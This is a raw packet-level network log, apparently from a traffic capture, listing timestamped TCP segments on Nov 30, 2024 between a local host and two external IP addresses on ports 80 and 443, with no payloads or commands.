Nov 30, 2024 04:06:27.689542055 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.689588070 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.689641953 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.689692974 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.691010952 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.691158056 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.691195965 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.692455053 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.692498922 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.692563057 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.692608118 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.693877935 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.693923950 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.693980932 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.694020987 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.695352077 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.698575974 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.819050074 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.819215059 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.819371939 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.819602966 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.819649935 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.819711924 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.819755077 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.820743084 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.820817947 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.820861101 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.820930958 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.821902990 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.821959019 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.822000980 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.822045088 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.822993040 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.823102951 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.823151112 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.824132919 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.824184895 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.824223042 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.824265957 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.825268984 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.825320005 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.825385094 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.825427055 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.826401949 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.826469898 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.826499939 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.826565981 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.827513933 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.827567101 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.827610970 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.827651978 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.828639030 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.828689098 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.828747988 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.828788042 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.829823971 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.829873085 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.829929113 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.829966068 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.830903053 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.831012011 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.831058025 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.832041025 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.832092047 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.832108974 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.832154989 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.833158970 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.833211899 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.833252907 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.833293915 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.834280014 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.834345102 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.834388018 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.834429026 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.835433960 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.835592031 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.835634947 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.836885929 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.836939096 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.836972952 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.837017059 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.837666035 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.837711096 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.837788105 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.837826967 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.838798046 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.838913918 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.838959932 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.839956045 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.840018988 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.840032101 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.840075016 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.841054916 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.841111898 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.841156006 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.841240883 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.842191935 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.842291117 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.842338085 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.843302011 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.843406916 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.843449116 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.844428062 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.844475985 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.844527960 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.844573021 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.845587015 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.845633030 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.845674038 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.845716953 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.846673012 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.846719980 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.846761942 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.847826958 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.847872972 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.847913027 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.847954988 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.849136114 CET	443	49803	104.21.16.9	192.168.2.4
Nov 30, 2024 04:06:27.849189043 CET	443	49803	104.21.16.9	192.168.2.4
Nov 30, 2024 04:06:27.849217892 CET	443	49803	104.21.16.9	192.168.2.4
Nov 30, 2024 04:06:27.849250078 CET	443	49803	104.21.16.9	192.168.2.4
Nov 30, 2024 04:06:27.849257946 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.849267960 CET	49803	443	192.168.2.4	104.21.16.9
Nov 30, 2024 04:06:27.849268913 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.849282980 CET	443	49803	104.21.16.9	192.168.2.4
Nov 30, 2024 04:06:27.849306107 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.849308968 CET	49803	443	192.168.2.4	104.21.16.9
Nov 30, 2024 04:06:27.849338055 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.850075006 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.850120068 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.850162983 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.850204945 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.851174116 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.851298094 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.851347923 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.851814032 CET	443	49803	104.21.16.9	192.168.2.4
Nov 30, 2024 04:06:27.851857901 CET	49803	443	192.168.2.4	104.21.16.9
Nov 30, 2024 04:06:27.851866007 CET	443	49803	104.21.16.9	192.168.2.4
Nov 30, 2024 04:06:27.852307081 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.852412939 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.852461100 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.853436947 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.853481054 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.853547096 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.853591919 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.854571104 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.854680061 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.854710102 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.854751110 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.855775118 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.855879068 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.855928898 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.856832981 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.856870890 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.856935978 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.856976032 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.857954025 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.857995987 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.858064890 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.858103991 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.859097958 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.859196901 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.859236956 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.860204935 CET	443	49803	104.21.16.9	192.168.2.4
Nov 30, 2024 04:06:27.860213041 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.860236883 CET	443	49803	104.21.16.9	192.168.2.4
Nov 30, 2024 04:06:27.860240936 CET	49803	443	192.168.2.4	104.21.16.9
Nov 30, 2024 04:06:27.860248089 CET	443	49803	104.21.16.9	192.168.2.4
Nov 30, 2024 04:06:27.860260963 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.860285997 CET	49803	443	192.168.2.4	104.21.16.9
Nov 30, 2024 04:06:27.860327005 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.860366106 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.861357927 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.861398935 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.861470938 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.861512899 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.862459898 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.862498999 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.862570047 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.863611937 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.863650084 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.863719940 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.863759041 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.864890099 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.864929914 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.864994049 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.865035057 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.865879059 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.865921974 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.865963936 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.866002083 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.867013931 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.867115021 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.867160082 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.868128061 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.868169069 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.868232965 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.868271112 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.868686914 CET	443	49803	104.21.16.9	192.168.2.4
Nov 30, 2024 04:06:27.869251013 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.869355917 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.869417906 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.870363951 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.870409966 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.870481968 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.870528936 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.871493101 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.871611118 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.871658087 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.872622013 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.872664928 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.872733116 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.872776985 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.873812914 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.873864889 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.873914957 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.873955965 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.874881029 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.875009060 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.875057936 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.876029968 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.876075983 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.876123905 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.876173019 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.877139091 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.877182961 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.877263069 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.877306938 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.878226995 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.878272057 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.921061993 CET	49803	443	192.168.2.4	104.21.16.9
Nov 30, 2024 04:06:27.968957901 CET	443	49803	104.21.16.9	192.168.2.4
Nov 30, 2024 04:06:28.014697075 CET	49803	443	192.168.2.4	104.21.16.9
Nov 30, 2024 04:06:28.020657063 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.020709038 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.020785093 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.020837069 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.021162033 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.021203995 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.021276951 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.021317959 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.022315979 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.022358894 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.022428036 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.022473097 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.023442030 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.023466110 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.023489952 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.023509026 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.024555922 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.024601936 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.024677992 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.024718046 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.025665045 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.025703907 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.025773048 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.025811911 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.026781082 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.026823044 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.026911020 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.026951075 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.027940035 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.027980089 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.028050900 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.028095961 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.029059887 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.029103041 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.029172897 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.029215097 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.030174971 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.030219078 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.030296087 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.030333042 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.031618118 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.031657934 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.031704903 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.031744003 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.032428980 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.032466888 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.032497883 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.032536983 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.033580065 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.033621073 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.033689022 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.033730984 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.034681082 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.034730911 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.034790039 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.034837961 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.035821915 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.035870075 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.035940886 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.035990953 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.036943913 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.036979914 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.037045956 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.037091970 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.038078070 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.038120985 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.038182020 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.038225889 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.039199114 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.039237976 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.039323092 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.039395094 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.040323973 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.040368080 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.040436983 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.040473938 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.041454077 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.041493893 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.041563988 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.041601896 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.042607069 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.042659998 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.042707920 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.042752981 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.043728113 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.043775082 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.043822050 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.043864965 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.044843912 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.044884920 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.044944048 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.044985056 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.045974970 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.046015978 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.046083927 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.046123981 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.047091007 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.047130108 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.047204971 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.047247887 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.048219919 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.048260927 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.048304081 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.048342943 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.049345016 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.049385071 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.049449921 CET	80	49800	185.215.113.16	192.168.2.4
